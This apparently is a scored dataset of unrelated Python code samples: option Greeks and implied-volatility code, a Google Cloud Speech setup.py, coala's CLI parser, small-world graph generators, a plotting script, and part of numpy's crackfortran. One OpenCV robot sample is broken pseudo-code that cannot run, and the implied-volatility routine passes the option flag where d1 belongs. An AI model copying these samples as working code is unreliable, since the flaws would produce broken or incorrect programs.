gamma""" if v <= 0: return 0 if not d1: d1: float = calculate_d1(s, k, r, t, v) _gamma: float = exp(-r * t) * pdf(d1) / (s * v * sqrt(t)) gamma: float = _gamma * pow(s, 2) * 0.0001 return gamma def calculate_theta( s: float, k: float, r: float, t: float, v: float, cp: int, d1: float = 0.0, annual_days: int = 240 ) -> float: """Calculate option theta""" if v <= 0: return 0 if not d1: d1: float = calculate_d1(s, k, r, t, v) d2: float = d1 - v * sqrt(t) _theta = -s * exp(-r * t) * pdf(d1) * v / (2 * sqrt(t)) \ + cp * r * s * exp(-r * t) * cdf(cp * d1) \ - cp * r * k * exp(-r * t) * cdf(cp * d2) theta = _theta / annual_days return theta def calculate_vega( s: float, k: float, r: float, t: float, v: float, d1: float = 0.0 ) -> float: """Calculate option vega(%)""" vega: float = calculate_original_vega(s, k, r, t, v, d1) / 100 return vega def calculate_original_vega( s: float, k: float, r: float, t: float, v: float, d1: float = 0.0 ) -> float: """Calculate option vega""" if v <= 0: return 0 if not d1: d1: float = calculate_d1(s, k, r, t, v) vega: float = s * exp(-r * t) * pdf(d1) * sqrt(t) return vega def calculate_greeks( s: float, k: float, r: float, t: float, v: float, cp: int, annual_days: int = 240 ) -> Tuple[float, float, float, float, float]: """Calculate option price and greeks""" d1: float = calculate_d1(s, k, r, t, v) price: float = calculate_price(s, k, r, t, v, cp, d1) delta: float = calculate_delta(s, k, r, t, v, cp, d1) gamma: float = calculate_gamma(s, k, r, t, v, d1) theta: float = calculate_theta(s, k, r, t, v, cp, d1, annual_days) vega: float = calculate_vega(s, k, r, t, v, d1) return price, delta, gamma, theta, vega def calculate_impv( price: float, s: float, k: float, r: float, t: float, cp: int ): """Calculate option implied volatility""" # Check option price must be positive if price <= 0: return 0 # Check if option price meets minimum value (exercise value) meet: bool = False if cp == 1 and (price > (s - k) * exp(-r * t)): meet = True elif cp == -1 and (price > k * exp(-r * t) - s): meet = True # If minimum value not met, return 0 if not meet: return 0 # Calculate implied volatility with Newton's method v: float = 0.01 # Initial guess of volatility for i in range(50): # Caculate option price and vega with current guess p: float = calculate_price(s, k, r, t, v, cp) vega: float = calculate_original_vega(s, k, r, t, v, cp) # Break loop if vega too close to 0 if not vega: break # Calculate error value dx: float = (price - p) / vega # Check if error value meets requirement if abs(dx) < 0.00001: break # Calculate guessed implied volatility of next round v += dx # Check end result to be non-negative if v <= 0: return 0 # Round to 4 decimal places v = round(v, 4) return v
0
"""A setup module for the GAPIC Google Cloud Speech API library. See: https://packaging.python.org/en/latest/distributing.html https://github.com/pypa/sampleproject """ from setuptools import setup, find_packages import sys install_requires = [ 'google-gax>=0.15.7, <0.16dev', 'oauth2client>=2.0.0, <4.0dev', 'proto-google-cloud-speech-v1[grpc]>=0.15.4, <0.16dev', 'googleapis-common-protos[grpc]>=1.5.2, <2.0dev', ] setup( name='gapic-google-cloud-speech-v1', version='0.15.4', author='Google Inc', author_email='googleapis-packages@google.com', classifiers=[ 'Intended Audience :: Developers', 'Development Status :: 3 - Alpha', 'Intended Audience :: Developers', 'License :: OSI Approved :: Apache Software License', 'Programming Language :: Python', 'Programming Language :: Python :: 2', 'Programming Language :: Python :: 2.7', 'Programming Language :: Python :: 3', 'Programming Language :: Python :: 3.4', 'Programming Language :: Python :: 3.5', 'Programming Language :: Python :: Implementation :: CPython', ], description='GAPIC library for the Google Cloud Speech API', include_package_data=True, long_description=open('README.rst').read(), install_requires=install_requires, license='Apache-2.0', packages=find_packages(), namespace_packages=[ 'google', 'google.cloud', 'google.cloud.gapic', 'google.cloud.gapic.speech' ], url='https://github.com/googleapis/googleapis')
0
import argparse from coalib.misc import Constants from coalib.collecting.Collectors import get_all_bears_names from coalib.parsing.FilterHelper import available_filters class CustomFormatter(argparse.RawDescriptionHelpFormatter): """ A Custom Formatter that will keep the metavars in the usage but remove them in the more detailed arguments section. """ def _format_action_invocation(self, action): if not action.option_strings: # For arguments that don't have options strings metavar, = self._metavar_formatter(action, action.dest)(1) return metavar else: # Option string arguments (like "-f, --files") parts = action.option_strings return ', '.join(parts) def default_arg_parser(formatter_class=None): """ This function creates an ArgParser to parse command line arguments. :param formatter_class: Formatting the arg_parser output into a specific form. For example: In the manpage format. """ formatter_class = (CustomFormatter if formatter_class is None else formatter_class) description = """ coala provides a common command-line interface for linting and fixing all your code, regardless of the programming languages you use. To find out what kind of analysis coala offers for the languages you use, visit http://coala.io/languages, or run:: $ coala --show-bears --filter-by-language C Python To perform code analysis, simply specify the analysis routines (bears) and the files you want it to run on, for example: spaceBear:: $ coala --bears SpaceConsistencyBear --files **.py coala can also automatically fix your code: spacePatchBear:: $ coala --bears SpaceConsistencyBear --files **.py --apply-patches To run coala without user interaction, run the `coala --non-interactive`, `coala --json` and `coala --format` commands. """ arg_parser = argparse.ArgumentParser( formatter_class=formatter_class, prog='coala', description=description, # Use our own help so that we can put it in the group we want add_help=False) arg_parser.add_argument('TARGETS', nargs='*', help='sections to be executed exclusively') info_group = arg_parser.add_argument_group('Info') info_group.add_argument('-h', '--help', action='help', help='show this help message and exit') info_group.add_argument('-v', '--version', action='version', version=Constants.VERSION) mode_group = arg_parser.add_argument_group('Mode') mode_group.add_argument( '-C', '--non-interactive', const=True, action='store_const', help='run coala in non interactive mode') mode_group.add_argument( '--ci', action='store_const', dest='non_interactive', const=True, help='continuous integration run, alias for `--non-interactive`') mode_group.add_argument( '--json', const=True, action='store_const', help='mode in which coala will display output as json') mode_group.add_argument( '--format', const=True, nargs='?', metavar='STR', help='output results with a custom format string, e.g. ' '"Message: {message}"; possible placeholders: ' 'id, origin, file, line, end_line, column, end_column, ' 'severity, severity_str, message, message_base, ' 'message_arguments, affected_code, source_lines') config_group = arg_parser.add_argument_group('Configuration') config_group.add_argument( '-c', '--config', nargs=1, metavar='FILE', help='configuration file to be used, defaults to {}'.format( Constants.default_coafile)) config_group.add_argument( '-F', '--find-config', action='store_const', const=True, help='find {} in ancestors of the working directory'.format( Constants.default_coafile)) config_group.add_argument( '-I', '--no-config', const=True, action='store_const', help='run without using any config file') config_group.add_argument( '-s', '--save', nargs='?', const=True, metavar='FILE', help='save used arguments to a config file to a {}, the given path, ' 'or at the value of -c'.format(Constants.default_coafile)) config_group.add_argument( '--disable-caching', const=True, action='store_const', help='run on all files even if unchanged') config_group.add_argument( '--flush-cache', const=True, action='store_const', help='rebuild the file cache') config_group.add_argument( '--no-autoapply-warn', const=True, action='store_const', help='turn off warning about patches not being auto applicable') inputs_group = arg_parser.add_argument_group('Inputs') inputs_group.add_argument( '-b', '--bears', nargs='+', metavar='NAME', help='names of bears to use').completer = ( lambda *args, **kwargs: get_all_bears_names()) # pragma: no cover inputs_group.add_argument( '-f', '--files', nargs='+', metavar='FILE', help='files that should be checked') inputs_group.add_argument( '-i', '--ignore', nargs='+', metavar='FILE', help='files that should be ignored') inputs_group.add_argument( '--limit-files', nargs='+', metavar='FILE', help="filter the `--files` argument's matches further") inputs_group.add_argument( '-d', '--bear-dirs', nargs='+', metavar='DIR', help='additional directories which may contain bears') outputs_group = arg_parser.add_argument_group('Outputs') outputs_group.add_argument( '-V', '--verbose', action='store_const', dest='log_level', const='DEBUG', help='alias for `-L DEBUG`') outputs_group.add_argument( '-L', '--log-level', nargs=1, choices=['ERROR', 'INFO', 'WARNING', 'DEBUG'], metavar='ENUM', help='set log output level to DEBUG/INFO/WARNING/ERROR, ' 'defaults to INFO') outputs_group.add_argument( '-m', '--min-severity', nargs=1, choices=('INFO', 'NORMAL', 'MAJOR'), metavar='ENUM', help='set minimal result severity to INFO/NORMAL/MAJOR') outputs_group.add_argument( '-N', '--no-color', const=True, action='store_const', help='display output without coloring (excluding logs)') outputs_group.add_argument( '-B', '--show-bears', const=True, action='store_const', help='list all bears') outputs_group.add_argument( '-l', '--filter-by-language', nargs='+', metavar='LANG', help='filters `--show-bears` by the given languages') outputs_group.add_argument( '--filter-by', action='append', nargs='+', metavar=('FILTER_NAME FILTER_ARG', 'FILTER_ARG'), help='filters `--show-bears` by the filter given as argument. ' 'Available filters: {}'.format(', '.join(sorted( available_filters)))) outputs_group.add_argument( '-p', '--show-capabilities', nargs='+', metavar='LANG', help='show what coala can fix and detect for the given languages') outputs_group.add_argument( '-D', '--show-description', const=True, action='store_const', help='show bear descriptions for `--show-bears`') outputs_group.add_argument( '--show-details', const=True, action='store_const', help='show bear details for `--show-bears`') outputs_group.add_argument( '--log-json', const=True, action='store_const', help='output logs as json along with results' ' (must be called with --json)') outputs_group.add_argument( '-o', '--output', nargs=1, metavar='FILE', help='write results to the given file (must be called with --json)') outputs_group.add_argument( '-r', '--relpath', nargs='?', const=True, help='return relative paths for files (must be called with --json)') misc_group = arg_parser.add_argument_group('Miscellaneous') misc_group.add_argument( '-S', '--settings', nargs='+', metavar='SETTING', help='arbitrary settings in the form of section.key=value') misc_group.add_argument( '-a', '--apply-patches', action='store_const', dest='default_actions', const='*: ApplyPatchAction', help='apply all patches automatically if possible') misc_group.add_argument( '-j', '--jobs', type=int, help='number of jobs to use in parallel') misc_group.add_argument( '-n', '--no-orig', const=True, action='store_const', help="don't create .orig backup files before patching") misc_group.add_argument( '-A', '--single-action', const=True, action='store_const', help='apply a single action for all results') misc_group.add_argument( '--debug', const=True, action='store_const', help='run coala in debug mode, starting ipdb, ' 'which must be separately installed, ' 'on unexpected internal exceptions ' '(implies --verbose)') try: # Auto completion should be optional, because of somewhat complicated # setup. import argcomplete argcomplete.autocomplete(arg_parser) except ImportError: # pragma: no cover pass return arg_parser
0
#!/usr/bin/python import random import math # n is the number of nodes # r is the radius of each node (a node u is connected with each other node at distance at most r) - strong ties # k is the number of random edges for each node u - weak ties def WSGridGraph(n, r, k): line = int(math.sqrt(n)) graph = dict() #Initialization for i in range(line): #i represents the grid row for j in range(line): #j represents the grid coloumn graph[i*line+j] = set() #Each node is identified by a number in [0, n - 1] #For each node u, we add an edge to each node at distance at most r from u for i in range(line): for j in range(line): for x in range(r+1): # x is the horizontal offset for y in range(r+1-x): # y is the vertical offset. The sum of offsets must be at most r if x + y > 0: # The sum of offsets must be at least 1 if i + x < line and j + y < line: graph[i*line+j].add((i+x)*line+(j+y)) graph[(i+x)*line+(j+y)].add(i*line+j) # We do not consider(i+x,j-y) (i-x,j+y) and (i-x,j-y) since the edge between these nodes and (i,j) has been already added at previous iterations #For each node u, we add a node to k randomly chosen nodes for h in range(k): s = random.randint(0,n-1) if s != i*line+j: graph[i*line+j].add(s) graph[s].add(i*line+j) return graph # n is the number of nodes # r is the radius # k is the number of random edges def WS2DGraph(n, r, k): line = int(math.sqrt(n)) graph = dict() #Initialization for i in range(n): x = random.random() y = random.random() graph[i] = dict() graph[i]["x"] = x*line graph[i]["y"] = y*line graph[i]["list"] = set() #For each node u, we add an edge to each node at distance at most r from u for i in range(n): for j in range(i+1,n): dist=math.sqrt((graph[i]["x"]-graph[j]["x"])**2 + (graph[i]["y"]-graph[j]["y"])**2) # Euclidean distance between i and j if dist <= r: graph[i]["list"].add(j) graph[j]["list"].add(i) #For each node u, we add a node to k randomly chosen nodes for h in range(k): s = random.randint(0,n-1) if s != i: graph[i]["list"].add(s) graph[s]["list"].add(i) return graph def countEdges(graph): edges = 0 for k in graph.keys(): edges += len(graph[k]) return int(edges/2)
0.034741
class RecordOverwriteError(Exception): '''Raised when attempting to overwrite existing recorded relationships.''' def __init__(self, message, errors): super(RecordOverwriteError, self).__init__(message) self.errors = errors class ReferenceUnimportedContent(Exception): '''Raised when referencing content that has not been imported.''' def __init__(self, message, errors): super(ReferenceUnimportedContent, self).__init__(message) self.errors = errors class PageNotImportable(Exception): '''Raised when attempting to create page.''' def __init__(self, message, errors): super(PageNotImportable, self).__init__(message) self.errors = errors class ImportedPageNotSavable(Exception): '''Raised when attempting to save imported page.''' def __init__(self, message, errors): super(ImportedPageNotSavable, self).__init__(message) self.errors = errors class ImageInfoListFetchFailed(Exception): '''Raised when attempting to save imported page.''' def __init__(self, message, errors): super(ImageInfoListFetchFailed, self).__init__(message) self.errors = errors class ImageInfoFetchFailed(Exception): '''Raised when attempting to save imported page.''' def __init__(self, message, errors): super(ImageInfoFetchFailed, self).__init__(message) self.errors = errors class ImageCreationFailed(Exception): def __init__(self, message, errors): super(ImageCreationFailed, self).__init__(message) self.errors = errors class ImportedContentInvalid(Exception): def __init__(self, message, errors): super(ImportedContentInvalid, self).__init__(message) self.errors = errors
0
#!/usr/bin/env python import sys import matplotlib.pyplot as plt import argparse from utilities import filesFromList, inputIfNone from plotTools import userLabels, plotXX ''' Description: A script to plot multiple files with data in [x, y1, y2, ..., yn] format. Run the script in the directory where you have the data files: $ uniplot.py <search string> [options] Author: Mikko Auvinen mikko.auvinen@helsinki.fi University of Helsinki & Finnish Meteorological Institute ''' #=======MAIN PROGRAM========================================# parser = argparse.ArgumentParser() parser.add_argument("strKey", nargs='?', default=None,\ help="Search string for collecting files.") parser.add_argument("--log", action="store_true", default=False,\ help="Logarithmic y-axis.") parser.add_argument("--labels", action="store_true", default=False,\ help="User specified labels.") parser.add_argument("-fx", "--factorX", type=float, default=1.0,\ help="Multiplication factor for x-values: fx*x") parser.add_argument("-fy", "--factorY", type=float, default=1.0,\ help="Multiplication factor for y-values: fy*y") parser.add_argument("-s", "--save", type=str, default=None, \ help="Name of the saved figure. Default=None") args = parser.parse_args() #==========================================================# # Rename ... strKey = args.strKey factorX = args.factorX factorY = args.factorY logOn = args.log labelsOn= args.labels saveFig = args.save strKey = inputIfNone( strKey , " Enter search string: " ) plt.rc('xtick', labelsize=24); #plt.rc('ytick.major', size=10) plt.rc('ytick', labelsize=24); #plt.rc('ytick.minor', size=6) while 1: fileNos, fileList = filesFromList( "*"+strKey+"*" ) pfig = plt.figure(num=1, figsize=(12.,9.5)); for fn in fileNos: pfig = plotXX( pfig, fileList[fn], logOn, factorX, factorY ) if( labelsOn ): pfig = userLabels( pfig ) plt.grid(True) plt.legend(loc=0) if( saveFig ): pfig.savefig( saveFig, format='jpg', dpi=300) plt.show()
0.025136
import numpy as np import cv2 #calibration variables startingPositon startingDirection vec2 OriginalDesiredDirection float DistanceOfGoal; float ExtraDistancel DesiredEndPosition = SetNewEndPoint(OriginalDesiredDirection, DistanceOfGoal); shapeToStayIn; #----------getting the imediate collisions ------------ #image = cv2.VideoCapture(0) image = cv2.OpenImage("/home/chris/Pictures/TestImages/BirdsEye.jpg2"); startColour = { 167, 166, 174}; endColour = { 218, 205, 189 }; theFloor = cv2.inRange(image, startColour, endColour); countours = cv2.findContours(theFloor, mode, method); shapeToStayIn = countours; #-------------------------- #CreateGrid RaceOnLoop() { if(HasCrossedLine()) { End; } if(HasReachedEndPoint() && !HasCrossedLine()) { DiffFromDesiredDirection = OriginalDesiredDirection - CurrentDirection; SetNewEndPoint(DiffFromDesiredDirection, ExtraDistance); } RecreateAStarGrid(); WorkOutPositionOnGrid(); SetNewEndPointToAStarTarget(); } CentreOfCircle() { if(HasReachedCentre()) { End; } if(KnowsCentre()) { MoveTowardsEndPoint(); } else { if(!FoundArcLine) { MoveForward() ScanForArc(); } else #Found arc, not processed { KnowsCentre = WorkOutCentreFromArc(); } } } #this would work best if using behavours #the robot would "pursue" an end point #the end point would "pursue" something directly in front of the robot BUT #would colide with something slightly bigger thencircle GoRoundCircle { if(!FoundLine) { MoveForward() ScanForArc(); } else { if(DistanceFromArc > allowedFarDistance) { MoveTowardsArc; } else if(DistanceFromArc < allowedNearDistance) { MoveAwayFromArc; } } } #----------IGNOR-----get goal intellegently------------------------- #get rid of floor image = cv2.OpenImage("/home/chris/Pictures/TestImages/FirstPosition.jpg theFloor = cv2.inRange(image, startColour, endColour); noFloor = cv2.subtract(theFloor, image); horizonEye = cropImage(theFloor, bottom+1); #this would crop the image to a 1D texture furthestPoint = depthTest(horizonEye); #find the part in the image furthest away. goal = translateToBirdseyePlane(furthestPoint); set(furthestPoint); #cv2.findContours( cv2. cap.release() cv2.destroyAllWindows()
0.038279
#!/usr/bin/env python """ crackfortran --- read fortran (77,90) code and extract declaration information. Usage is explained in the comment block below. Copyright 1999-2004 Pearu Peterson all rights reserved, Pearu Peterson <pearu@ioc.ee> Permission to use, modify, and distribute this software is given under the terms of the NumPy License. NO WARRANTY IS EXPRESSED OR IMPLIED. USE AT YOUR OWN RISK. $Date: 2005/09/27 07:13:49 $ Pearu Peterson """ __version__ = "$Revision: 1.177 $"[10:-1] import platform import __version__ f2py_version = __version__.version """ Usage of crackfortran: ====================== Command line keys: -quiet,-verbose,-fix,-f77,-f90,-show,-h <pyffilename> -m <module name for f77 routines>,--ignore-contains Functions: crackfortran, crack2fortran The following Fortran statements/constructions are supported (or will be if needed): block data,byte,call,character,common,complex,contains,data, dimension,double complex,double precision,end,external,function, implicit,integer,intent,interface,intrinsic, logical,module,optional,parameter,private,public, program,real,(sequence?),subroutine,type,use,virtual, include,pythonmodule Note: 'virtual' is mapped to 'dimension'. Note: 'implicit integer (z) static (z)' is 'implicit static (z)' (this is minor bug). Note: code after 'contains' will be ignored until its scope ends. Note: 'common' statement is extended: dimensions are moved to variable definitions Note: f2py directive: <commentchar>f2py<line> is read as <line> Note: pythonmodule is introduced to represent Python module Usage: `postlist=crackfortran(files,funcs)` `postlist` contains declaration information read from the list of files `files`. `crack2fortran(postlist)` returns a fortran code to be saved to pyf-file `postlist` has the following structure: *** it is a list of dictionaries containing `blocks': B = {'block','body','vars','parent_block'[,'name','prefix','args','result', 'implicit','externals','interfaced','common','sortvars', 'commonvars','note']} B['block'] = 'interface' | 'function' | 'subroutine' | 'module' | 'program' | 'block data' | 'type' | 'pythonmodule' B['body'] --- list containing `subblocks' with the same structure as `blocks' B['parent_block'] --- dictionary of a parent block: C['body'][<index>]['parent_block'] is C B['vars'] --- dictionary of variable definitions B['sortvars'] --- dictionary of variable definitions sorted by dependence (independent first) B['name'] --- name of the block (not if B['block']=='interface') B['prefix'] --- prefix string (only if B['block']=='function') B['args'] --- list of argument names if B['block']== 'function' | 'subroutine' B['result'] --- name of the return value (only if B['block']=='function') B['implicit'] --- dictionary {'a':<variable definition>,'b':...} | None B['externals'] --- list of variables being external B['interfaced'] --- list of variables being external and defined B['common'] --- dictionary of common blocks (list of objects) B['commonvars'] --- list of variables used in common blocks (dimensions are moved to variable definitions) B['from'] --- string showing the 'parents' of the current block B['use'] --- dictionary of modules used in current block: {<modulename>:{['only':<0|1>],['map':{<local_name1>:<use_name1>,...}]}} B['note'] --- list of LaTeX comments on the block B['f2pyenhancements'] --- optional dictionary {'threadsafe':'','fortranname':<name>, 'callstatement':<C-expr>|<multi-line block>, 'callprotoargument':<C-expr-list>, 'usercode':<multi-line block>|<list of multi-line blocks>, 'pymethoddef:<multi-line block>' } B['entry'] --- dictionary {entryname:argslist,..} B['varnames'] --- list of variable names given in the order of reading the Fortran code, useful for derived types. B['saved_interface'] --- a string of scanned routine signature, defines explicit interface *** Variable definition is a dictionary D = B['vars'][<variable name>] = {'typespec'[,'attrspec','kindselector','charselector','=','typename']} D['typespec'] = 'byte' | 'character' | 'complex' | 'double complex' | 'double precision' | 'integer' | 'logical' | 'real' | 'type' D['attrspec'] --- list of attributes (e.g. 'dimension(<arrayspec>)', 'external','intent(in|out|inout|hide|c|callback|cache|aligned4|aligned8|aligned16)', 'optional','required', etc) K = D['kindselector'] = {['*','kind']} (only if D['typespec'] = 'complex' | 'integer' | 'logical' | 'real' ) C = D['charselector'] = {['*','len','kind']} (only if D['typespec']=='character') D['='] --- initialization expression string D['typename'] --- name of the type if D['typespec']=='type' D['dimension'] --- list of dimension bounds D['intent'] --- list of intent specifications D['depend'] --- list of variable names on which current variable depends on D['check'] --- list of C-expressions; if C-expr returns zero, exception is raised D['note'] --- list of LaTeX comments on the variable *** Meaning of kind/char selectors (few examples): D['typespec>']*K['*'] D['typespec'](kind=K['kind']) character*C['*'] character(len=C['len'],kind=C['kind']) (see also fortran type declaration statement formats below) Fortran 90 type declaration statement format (F77 is subset of F90) ==================================================================== (Main source: IBM XL Fortran 5.1 Language Reference Manual) type declaration = <typespec> [[<attrspec>]::] <entitydecl> <typespec> = byte | character[<charselector>] | complex[<kindselector>] | double complex | double precision | integer[<kindselector>] | logical[<kindselector>] | real[<kindselector>] | type(<typename>) <charselector> = * <charlen> | ([len=]<len>[,[kind=]<kind>]) | (kind=<kind>[,len=<len>]) <kindselector> = * <intlen> | ([kind=]<kind>) <attrspec> = comma separated list of attributes. Only the following attributes are used in building up the interface: external (parameter --- affects '=' key) optional intent Other attributes are ignored. <intentspec> = in | out | inout <arrayspec> = comma separated list of dimension bounds. <entitydecl> = <name> [[*<charlen>][(<arrayspec>)] | [(<arrayspec>)]*<charlen>] [/<init_expr>/ | =<init_expr>] [,<entitydecl>] In addition, the following attributes are used: check,depend,note TODO: * Apply 'parameter' attribute (e.g. 'integer parameter :: i=2' 'real x(i)' -> 'real x(2)') The above may be solved by creating appropriate preprocessor program, for example. """ # import sys import string import fileinput import re import pprint import os import copy from auxfuncs import * # Global flags: strictf77=1 # Ignore `!' comments unless line[0]=='!' sourcecodeform='fix' # 'fix','free' quiet=0 # Be verbose if 0 (Obsolete: not used any more) verbose=1 # Be quiet if 0, extra verbose if > 1. tabchar=4*' ' pyffilename='' f77modulename='' skipemptyends=0 # for old F77 programs without 'program' statement ignorecontains=1 dolowercase=1 debug=[] ## do_analyze = 1 ###### global variables ## use reload(crackfortran) to reset these variables groupcounter=0 grouplist={groupcounter:[]} neededmodule=-1 expectbegin=1 skipblocksuntil=-1 usermodules=[] f90modulevars={} gotnextfile=1 filepositiontext='' currentfilename='' skipfunctions=[] skipfuncs=[] onlyfuncs=[] include_paths=[] previous_context = None ###### Some helper functions def show(o,f=0):pprint.pprint(o) errmess=sys.stderr.write def outmess(line,flag=1): global filepositiontext if not verbose: return if not quiet: if flag:sys.stdout.write(filepositiontext) sys.stdout.write(line) re._MAXCACHE=50 defaultimplicitrules={} for c in "abcdefghopqrstuvwxyz$_": defaultimplicitrules[c]={'typespec':'real'} for c in "ijklmn": defaultimplicitrules[c]={'typespec':'integer'} del c badnames={} invbadnames={} for n in ['int','double','float','char','short','long','void','case','while', 'return','signed','unsigned','if','for','typedef','sizeof','union', 'struct','static','register','new','break','do','goto','switch', 'continue','else','inline','extern','delete','const','auto', 'len','rank','shape','index','slen','size','_i', 'max', 'min', 'flen','fshape', 'string','complex_double','float_double','stdin','stderr','stdout', 'type','default']: badnames[n]=n+'_bn' invbadnames[n+'_bn']=n def rmbadname1(name): if name in badnames: errmess('rmbadname1: Replacing "%s" with "%s".\n'%(name,badnames[name])) return badnames[name] return name def rmbadname(names): return map(rmbadname1,names) def undo_rmbadname1(name): if name in invbadnames: errmess('undo_rmbadname1: Replacing "%s" with "%s".\n'\ %(name,invbadnames[name])) return invbadnames[name] return name def undo_rmbadname(names): return map(undo_rmbadname1,names) def getextension(name): i=name.rfind('.') if i==-1: return '' if '\\' in name[i:]: return '' if '/' in name[i:]: return '' return name[i+1:] is_f_file = re.compile(r'.*[.](for|ftn|f77|f)\Z',re.I).match _has_f_header = re.compile(r'-[*]-\s*fortran\s*-[*]-',re.I).search _has_f90_header = re.compile(r'-[*]-\s*f90\s*-[*]-',re.I).search _has_fix_header = re.compile(r'-[*]-\s*fix\s*-[*]-',re.I).search _free_f90_start = re.compile(r'[^c*]\s*[^\s\d\t]',re.I).match def is_free_format(file): """Check if file is in free format Fortran.""" # f90 allows both fixed and free format, assuming fixed unless # signs of free format are detected. result = 0 f = open(file,'r') line = f.readline() n = 15 # the number of non-comment lines to scan for hints if _has_f_header(line): n = 0 elif _has_f90_header(line): n = 0 result = 1 while n>0 and line: if line[0]!='!' and line.strip(): n -= 1 if (line[0]!='\t' and _free_f90_start(line[:5])) or line[-2:-1]=='&': result = 1 break line = f.readline() f.close() return result ####### Read fortran (77,90) code def readfortrancode(ffile,dowithline=show,istop=1): """ Read fortran codes from files and 1) Get rid of comments, line continuations, and empty lines; lower cases. 2) Call dowithline(line) on every line. 3) Recursively call itself when statement \"include '<filename>'\" is met. """ global gotnextfile,filepositiontext,currentfilename,sourcecodeform,strictf77,\ beginpattern,quiet,verbose,dolowercase,include_paths if not istop: saveglobals=gotnextfile,filepositiontext,currentfilename,sourcecodeform,strictf77,\ beginpattern,quiet,verbose,dolowercase if ffile==[]: return localdolowercase = dolowercase cont=0 finalline='' ll='' commentline=re.compile(r'(?P<line>([^"]*["][^"]*["][^"!]*|[^\']*\'[^\']*\'[^\'!]*|[^!\'"]*))!{1}(?P<rest>.*)') includeline=re.compile(r'\s*include\s*(\'|")(?P<name>[^\'"]*)(\'|")',re.I) cont1=re.compile(r'(?P<line>.*)&\s*\Z') cont2=re.compile(r'(\s*&|)(?P<line>.*)') mline_mark = re.compile(r".*?'''") if istop: dowithline('',-1) ll,l1='','' spacedigits=[' ']+map(str,range(10)) filepositiontext='' fin=fileinput.FileInput(ffile) while 1: l=fin.readline() if not l: break if fin.isfirstline(): filepositiontext='' currentfilename=fin.filename() gotnextfile=1 l1=l strictf77=0 sourcecodeform='fix' ext = os.path.splitext(currentfilename)[1] if is_f_file(currentfilename) and \ not (_has_f90_header(l) or _has_fix_header(l)): strictf77=1 elif is_free_format(currentfilename) and not _has_fix_header(l): sourcecodeform='free' if strictf77: beginpattern=beginpattern77 else: beginpattern=beginpattern90 outmess('\tReading file %s (format:%s%s)\n'\ %(`currentfilename`,sourcecodeform, strictf77 and ',strict' or '')) l=l.expandtabs().replace('\xa0',' ') while not l=='': # Get rid of newline characters if l[-1] not in "\n\r\f": break l=l[:-1] if not strictf77: r=commentline.match(l) if r: l=r.group('line')+' ' # Strip comments starting with `!' rl=r.group('rest') if rl[:4].lower()=='f2py': # f2py directive l = l + 4*' ' r=commentline.match(rl[4:]) if r: l=l+r.group('line') else: l = l + rl[4:] if l.strip()=='': # Skip empty line cont=0 continue if sourcecodeform=='fix': if l[0] in ['*','c','!','C','#']: if l[1:5].lower()=='f2py': # f2py directive l=' '+l[5:] else: # Skip comment line cont=0 continue elif strictf77: if len(l)>72: l=l[:72] if not (l[0] in spacedigits): raise Exception('readfortrancode: Found non-(space,digit) char ' 'in the first column.\n\tAre you sure that ' 'this code is in fix form?\n\tline=%s' % `l`) if (not cont or strictf77) and (len(l)>5 and not l[5]==' '): # Continuation of a previous line ll=ll+l[6:] finalline='' origfinalline='' else: if not strictf77: # F90 continuation r=cont1.match(l) if r: l=r.group('line') # Continuation follows .. if cont: ll=ll+cont2.match(l).group('line') finalline='' origfinalline='' else: l=' '+l[5:] # clean up line beginning from possible digits. if localdolowercase: finalline=ll.lower() else: finalline=ll origfinalline=ll ll=l cont=(r is not None) else: l=' '+l[5:] # clean up line beginning from possible digits. if localdolowercase: finalline=ll.lower() else: finalline=ll origfinalline =ll ll=l elif sourcecodeform=='free': if not cont and ext=='.pyf' and mline_mark.match(l): l = l + '\n' while 1: lc = fin.readline() if not lc: errmess('Unexpected end of file when reading multiline\n') break l = l + lc if mline_mark.match(lc): break l = l.rstrip() r=cont1.match(l) if r: l=r.group('line') # Continuation follows .. if cont: ll=ll+cont2.match(l).group('line') finalline='' origfinalline='' else: if localdolowercase: finalline=ll.lower() else: finalline=ll origfinalline =ll ll=l cont=(r is not None) else: raise ValueError("Flag sourcecodeform must be either 'fix' or 'free': %s"%`sourcecodeform`) filepositiontext='Line #%d in %s:"%s"\n\t' % (fin.filelineno()-1,currentfilename,l1) m=includeline.match(origfinalline) if m: fn=m.group('name') if os.path.isfile(fn): readfortrancode(fn,dowithline=dowithline,istop=0) else: include_dirs = [os.path.dirname(currentfilename)] + include_paths foundfile = 0 for inc_dir in include_dirs: fn1 = os.path.join(inc_dir,fn) if os.path.isfile(fn1): foundfile = 1 readfortrancode(fn1,dowithline=dowithline,istop=0) break if not foundfile: outmess('readfortrancode: could not find include file %s in %s. Ignoring.\n'%(`fn`, os.pathsep.join(include_dirs))) else: dowithline(finalline) l1=ll if localdolowercase: finalline=ll.lower() else: finalline=ll origfinalline = ll filepositiontext='Line #%d in %s:"%s"\n\t' % (fin.filelineno()-1,currentfilename,l1) m=includeline.match(origfinalline) if m: fn=m.group('name') if os.path.isfile(fn): readfortrancode(fn,dowithline=dowithline,istop=0) else: include_dirs = [os.path.dirname(currentfilename)] + include_paths foundfile = 0 for inc_dir in include_dirs: fn1 = os.path.join(inc_dir,fn) if os.path.isfile(fn1): foundfile = 1 readfortrancode(fn1,dowithline=dowithline,istop=0) break if not foundfile: outmess('readfortrancode: could not find include file %s in %s. Ignoring.\n'%(`fn`, os.pathsep.join(include_dirs))) else: dowithline(finalline) filepositiontext='' fin.close() if istop: dowithline('',1) else: gotnextfile,filepositiontext,currentfilename,sourcecodeform,strictf77,\ beginpattern,quiet,verbose,dolowercase=saveglobals ########### Crack line beforethisafter=r'\s*(?P<before>%s(?=\s*(\b(%s)\b)))'+ \ r'\s*(?P<this>(\b(%s)\b))'+ \ r'\s*(?P<after>%s)\s*\Z' ## fortrantypes='character|logical|integer|real|complex|double\s*(precision\s*(complex|)|complex)|type(?=\s*\([\w\s,=(*)]*\))|byte' typespattern=re.compile(beforethisafter%('',fortrantypes,fortrantypes,'.*'),re.I),'type' typespattern4implicit=re.compile(beforethisafter%('',fortrantypes+'|static|automatic|undefined',fortrantypes+'|static|automatic|undefined','.*'),re.I) # functionpattern=re.compile(beforethisafter%('([a-z]+[\w\s(=*+-/)]*?|)','function','function','.*'),re.I),'begin' subroutinepattern=re.compile(beforethisafter%('[a-z\s]*?','subroutine','subroutine','.*'),re.I),'begin' #modulepattern=re.compile(beforethisafter%('[a-z\s]*?','module','module','.*'),re.I),'begin' # groupbegins77=r'program|block\s*data' beginpattern77=re.compile(beforethisafter%('',groupbegins77,groupbegins77,'.*'),re.I),'begin' 